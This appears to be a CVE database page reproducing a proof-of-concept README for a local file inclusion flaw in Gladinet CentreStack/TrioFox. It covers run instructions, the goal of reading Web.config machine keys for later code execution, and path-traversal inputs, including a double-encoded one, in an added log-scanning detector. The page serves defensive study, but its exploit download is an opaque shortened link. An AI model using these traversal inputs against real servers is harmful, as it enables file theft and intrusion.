POC details: abb7308574269acbd3c8688a0a2d0dfdaf2b9c5d

Source
Related vulnerability
Title: Gladinet CentreStack and Gladinet TrioFox security vulnerability (CVE-2025-11371)
Description: Gladinet CentreStack and Gladinet TrioFox are products of the US company Gladinet. Gladinet CentreStack is primarily a mobile-access and secure-sharing solution that provides self-hosted cloud storage. Gladinet TrioFox is the cloud-hosted service edition of the platform. Gladinet CentreStack and Gladinet TrioFox 16.7.10368.56560 and earlier contain a security vulnerability: the default installation and configuration expose an unauthenticated local file inclusion flaw, which can lead to unintended disclosure of system files.
Introduction
# CVE-2025-11371

### Overview
This repository contains a proof-of-concept exploit for CVE-2025-11371, an unauthenticated Local File Inclusion (LFI) vulnerability in Gladinet CentreStack and TrioFox. The exploit retrieves files readable by the web server process from a remote, unauthenticated position, such as the application's Web.config. That file carries the ASP.NET machineKey, and knowledge of the key is what enables follow-on remote code execution through deserialization flaws such as CVE-2025-30406.

Affected versions: all versions up to and including 16.7.10368.56560.


### Requirements
- Python 3.8+
- Libraries: requests (install via `pip install -r requirements.txt`); argparse is part of the Python standard library and needs no installation

### Usage
- Install dependencies: `pip install -r requirements.txt`
- Run the exploit: `python exploit.py --target <target_url> --file "/path/to/Web.config"`

Options:
- `--target`: Base URL of the CentreStack/TrioFox instance under test.
- `--file`: Path to the file to include, relative to the handler's base directory (e.g., `../../../../Windows/system.ini` as a harmless read for confirming the flaw).
- `--proxy`: Optional HTTP proxy through which all requests are routed.


### How It Works
The vulnerability stems from improper input validation in the temp handler of the UploadDownloadProxy component: a user-supplied path is used to open a file without being confined to the handler's working directory. The exploit sends a crafted request to that handler with `..` traversal sequences prepended to the requested file name, so the resolved path lands outside the web root and the server returns the file's contents.
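The same traversal that the exploit relies on is what a defender looks for in the IIS logs. The following is an added example, not code from the PoC repository or from Gladinet: it parses IIS W3C log lines, repeatedly percent-decodes each query parameter (double encoding and backslash variants included), and flags any value that climbs above its starting directory. The handler stem `/UploadDownloadProxy/temp`, the parameter name `s`, and the log lines themselves are constructed placeholders, not the real endpoint or real traffic; substitute the handler path from your own Web.config and your own log field layout.

```python
"""Flag path-traversal attempts against an upload/download handler in IIS W3C logs.

Added example for this page; it is not part of the PoC repository.
The handler stem, parameter name and log lines are constructed placeholders.
"""
import urllib.parse
from typing import Dict, Iterable, List


def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable (catches %252e%252e%252f style double encoding),
    then fold backslashes to forward slashes so Windows-style traversal is caught."""
    prev = None
    for _ in range(rounds):
        if value == prev:
            break
        prev, value = value, urllib.parse.unquote_plus(value)
    return value.replace("\\", "/")


def escapes_root(path: str) -> int:
    """Return how many directory levels above its starting directory the path
    climbs at its deepest point (0 means it never leaves the directory).
    'a/b/../c' stays inside; '../../x' climbs two levels."""
    depth = worst = 0
    for seg in path.split("/"):
        if seg == "..":
            depth -= 1
            worst = min(worst, depth)
        elif seg not in ("", "."):
            depth += 1
    return -worst


def parse_w3c(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Parse IIS W3C extended log lines using the #Fields: header for column names.
    IIS writes '+' for spaces inside a field, so splitting on a single space is safe."""
    fields: List[str] = []
    records: List[Dict[str, str]] = []
    for line in lines:
        line = line.rstrip("\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue  # malformed or truncated line; skip rather than misalign columns
        records.append(dict(zip(fields, parts)))
    return records


def find_traversal(records: Iterable[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return one hit per query parameter whose decoded value escapes its directory.
    IIS normally canonicalises cs-uri-stem itself, so encoded traversal survives
    in the query string, which is where this looks."""
    hits: List[Dict[str, object]] = []
    for rec in records:
        query = rec.get("cs-uri-query", "-")
        if query == "-":
            continue
        for key, values in urllib.parse.parse_qs(query, keep_blank_values=True).items():
            for raw in values:
                decoded = fully_decode(raw)
                climb = escapes_root(decoded)
                if climb > 0:
                    hits.append({
                        "c-ip": rec.get("c-ip"),
                        "cs-uri-stem": rec.get("cs-uri-stem"),
                        "param": key,
                        "decoded": decoded,
                        "climb": climb,
                        "sc-status": rec.get("sc-status"),
                    })
    return hits


# Constructed sample log (placeholder stem and parameter; not real traffic).
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2025-10-10 08:01:12 10.0.0.5 GET /UploadDownloadProxy/temp s=..%2F..%2F..%2F..%2FWindows%2Fsystem.ini 443 - 203.0.113.7 python-requests/2.32 200
2025-10-10 08:01:13 10.0.0.5 GET /portal/loginpage.aspx - 443 - 198.51.100.4 Mozilla/5.0+(Windows+NT+10.0) 200
2025-10-10 08:01:14 10.0.0.5 GET /UploadDownloadProxy/temp s=tmp%2Fupload123.dat 443 - 198.51.100.4 Mozilla/5.0+(Windows+NT+10.0) 200
2025-10-10 08:01:15 10.0.0.5 GET /UploadDownloadProxy/temp s=a%2Fb%2F..%2Fc 443 - 198.51.100.4 Mozilla/5.0+(Windows+NT+10.0) 404
2025-10-10 08:01:16 10.0.0.5 GET /UploadDownloadProxy/temp s=%252e%252e%255c%252e%252e%255cinetpub%255cwwwroot%255cWeb.config 443 - 203.0.113.7 curl/8.5.0 200
"""


def scan_sample() -> List[Dict[str, object]]:
    """Run the detector over the constructed sample; used by the __main__ block."""
    return find_traversal(parse_w3c(SAMPLE_LOG.splitlines()))


if __name__ == "__main__":
    for hit in scan_sample():
        print(f"{hit['c-ip']} {hit['cs-uri-stem']} {hit['param']}={hit['decoded']} "
              f"(climbs {hit['climb']} levels, status {hit['sc-status']})")
```

A 200 status on a flagged request is the strongest signal, since it means the handler actually served the traversed path; a 404 still shows probing and is worth correlating by source address.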

### Proof of Concept
Tested against a default CentreStack setup on Windows Server 2019. Files read successfully include:
- Web.config (machine key disclosure)
- Machine.config
- Sensitive logs in %PROGRAMDATA%

### Ethical Use Warning
- This script is a proof-of-concept for CVE-2025-11371 for educational and authorized security testing purposes.
- **Do not use this script on systems without explicit permission from the system owner.**
- Misuse may violate laws, including the Computer Fraud and Abuse Act (CFAA) in the United States or similar laws elsewhere.
- Always obtain written consent before testing any system.

### PoC Exploit - [href](https://tinyurl.com/ywabn2vc)

For any inquiries, please email me at: eviedejesu803@gmail.com

File snapshot

[4.0K] /data/pocs/abb7308574269acbd3c8688a0a2d0dfdaf2b9c5d
└── [1.9K] README.md

0 directories, 1 file